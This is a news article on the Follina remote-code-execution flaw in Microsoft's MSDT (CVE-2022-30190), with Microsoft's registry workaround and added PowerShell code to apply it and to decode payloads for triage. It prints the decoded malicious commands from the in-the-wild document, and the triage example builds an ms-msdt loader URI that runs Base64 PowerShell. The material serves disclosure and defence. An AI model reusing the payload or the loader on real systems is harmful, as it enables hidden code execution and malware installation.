Researchers from Shadow Chaser Group said on Twitter that the vulnerability in the Microsoft Support Diagnostic Tool (MSDT) had been reported to Microsoft on April 12, together with evidence that it was already being exploited in attacks.
In its reply to the researchers, however, the Microsoft Security Response Center did not treat the reported behavior as a security vulnerability, on the assumption that the MSDT diagnostic tool requires a passkey (password) before it will execute the payload.
On Monday, however, Microsoft changed its position, assigning the vulnerability CVE-2022-30190 and describing it as “critical”.
The advisory states: “A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.”
As of this article's publication, Microsoft had not released a patch. Instead, it advised customers to disable the MSDT URL protocol as follows:
1. Run Command Prompt as Administrator.
2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”.
3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
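The three steps above, as an added PowerShell example that applies the same workaround with the checks a deployment should have (this is my code, not Microsoft's script or anything from the article): the backup must exist before the key is deleted, the removal is verified afterwards, and a rollback is provided. The backup location and the function names are assumptions for the example; the reg.exe commands are the ones from the guidance.

```powershell
# Added example (not Microsoft's script or the article's): apply, verify and
# roll back the interim CVE-2022-30190 workaround from an elevated session.
#Requires -RunAsAdministrator

$KeyPath    = 'HKEY_CLASSES_ROOT\ms-msdt'
$BackupFile = Join-Path $env:ProgramData 'ms-msdt-backup.reg'   # assumed path

function Test-MsdtHandler {
    # True while an ms-msdt: URL protocol handler is registered. HKCR is a
    # merged view, so also report a per-user copy that HKCR would still show.
    $machine = Test-Path -LiteralPath 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msdt'
    $user    = Test-Path -LiteralPath 'Registry::HKEY_CURRENT_USER\SOFTWARE\Classes\ms-msdt'
    if ($user) { Write-Warning 'A per-user ms-msdt key also exists under HKCU\SOFTWARE\Classes.' }
    return ($machine -or $user)
}

function Disable-MsdtHandler {
    if (-not (Test-MsdtHandler)) {
        Write-Host 'ms-msdt handler is already absent; nothing to do.'
        return
    }
    # Step 2 of the guidance: back up the key first (/y overwrites an old backup).
    & reg.exe export $KeyPath $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0 -or -not (Test-Path -LiteralPath $BackupFile)) {
        throw "Backup of $KeyPath to $BackupFile failed; refusing to delete the key."
    }
    # Step 3: remove the handler so ms-msdt: URIs no longer launch msdt.exe.
    & reg.exe delete $KeyPath /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg delete exited with code $LASTEXITCODE" }
    # Verify, rather than assume, that the handler is gone.
    if (Test-MsdtHandler) { throw 'ms-msdt key still present after deletion.' }
    Write-Host "ms-msdt handler removed; backup saved to $BackupFile"
}

function Restore-MsdtHandler {
    # Undo the workaround (for example once a fix is installed) by re-importing the backup.
    if (-not (Test-Path -LiteralPath $BackupFile)) { throw "No backup found at $BackupFile" }
    & reg.exe import $BackupFile | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg import exited with code $LASTEXITCODE" }
    if (-not (Test-MsdtHandler)) { throw 'ms-msdt key not present after import.' }
    Write-Host "ms-msdt handler restored from $BackupFile"
}

Disable-MsdtHandler    # run Restore-MsdtHandler to roll back
```

Two caveats for anyone deploying this: removing the key only breaks the ms-msdt: protocol link, so troubleshooters remain reachable through the Get Help app and Settings, and the workaround is interim. Microsoft shipped a fix for CVE-2022-30190 in its June 2022 security updates; keep the exported .reg file so the handler can be restored once that update is installed.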
Although Microsoft initially dismissed it, the vulnerability came to light again when researchers found that a Word document uploaded to VirusTotal on Friday exploited a previously unknown attack vector.
According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. That HTML then uses the ms-msdt MSProtocol URI scheme to load and execute PowerShell commands.
That should not be possible in theory, yet in practice it is. When the commands embedded in the document are decoded, they resolve to:
$cmd = "c:\Windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
According to Huntress, the script does the following, all in a hidden window:
1. Terminate msdt.exe if it is running.
2. Search %temp% recursively for 05-2022-0438.rar, copy it to 1.rar, and pull out the line holding the Base64 string of an encoded CAB file (TVNDRgAAAA is the Base64 form of the CAB header bytes MSCF followed by zeros).
3. Write that Base64-encoded CAB data to 1.t.
4. Decode it with certutil into the CAB file 1.c.
5. Expand 1.c into the current directory (C:\users\public), and finally:
6. Run rgb.exe (presumably extracted from the 1.c CAB file).
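The decoding step the analysis above relies on, as an added PowerShell triage helper of my own (not code from the article, Beaumont or Huntress): it pulls ms-msdt: URIs out of a retrieved HTML file, Base64-decodes the PowerShell carried inside them, and flags the living-off-the-land commands seen in the decoded payload above. The sample HTML is constructed for this example; its URI shape follows the publicly analysed loader, and the encoded command is only stage 1 of the payload listed above. The function name, the regular expressions and the indicator list are assumptions made for the example.

```powershell
# Added example (not from the article or the researchers it cites): decode the
# PowerShell embedded in ms-msdt: URIs found in a retrieved HTML file.

function Get-MsdtPayload {
    param([Parameter(Mandatory)][string]$Html)

    $strictUtf8 = [Text.UTF8Encoding]::new($false, $true)   # throw on invalid bytes
    # Tokens from the decoded payload above; assumed indicator list for triage.
    $suspicious = 'taskkill', 'msdt.exe', 'certutil', 'findstr', 'expand', 'Start-Process', 'Invoke-Expression'
    $out = @()

    # An ms-msdt: URI runs to the end of its line or the next tag; trim quotes/semicolon.
    foreach ($uriMatch in [regex]::Matches($Html, 'ms-msdt:[^\r\n<>]+')) {
        $uri = $uriMatch.Value -replace '[\\";\s]+$', ''
        # Candidate Base64 blobs: long runs of the Base64 alphabet with optional padding.
        $decoded = foreach ($blob in [regex]::Matches($uri, '[A-Za-z0-9+/]{24,}={0,2}')) {
            try {
                $text = $strictUtf8.GetString([Convert]::FromBase64String($blob.Value))
                # keep only decodes that look like text, not binary noise
                if ($text -match '^[\x20-\x7e\r\n\t]+$') { $text }
            } catch { <# not valid Base64/UTF-8; skip #> }
        }
        $joined = @($decoded) -join "`n"
        $flags  = $suspicious | Where-Object { $joined -match [regex]::Escape($_) }
        $out += [pscustomobject]@{
            Uri             = $uri
            DecodedCommands = @($decoded)
            Indicators      = @($flags)
        }
    }
    return $out
}

# --- constructed sample input: stage 1 of the payload shown in the article ---
$stage1 = 'Start-Process cmd.exe -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"'
$b64    = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($stage1))
$sampleHtml = @'
<!doctype html><html><body><script>
// constructed sample: loader shape only, filler text omitted
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=$(Invoke-Expression([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('__B64__'))))\"";
</script></body></html>
'@ -replace '__B64__', $b64

Get-MsdtPayload -Html $sampleHtml | Format-List
```

On the sample input the helper returns one object whose DecodedCommands holds the stage 1 command and whose Indicators list contains taskkill, msdt.exe and Start-Process. Point it at a real HTML file with `Get-MsdtPayload -Html (Get-Content -Raw .\retrieved.html)`; the Base64 run is decoded with a strict UTF-8 decoder so padding-like junk in the page does not produce false "commands".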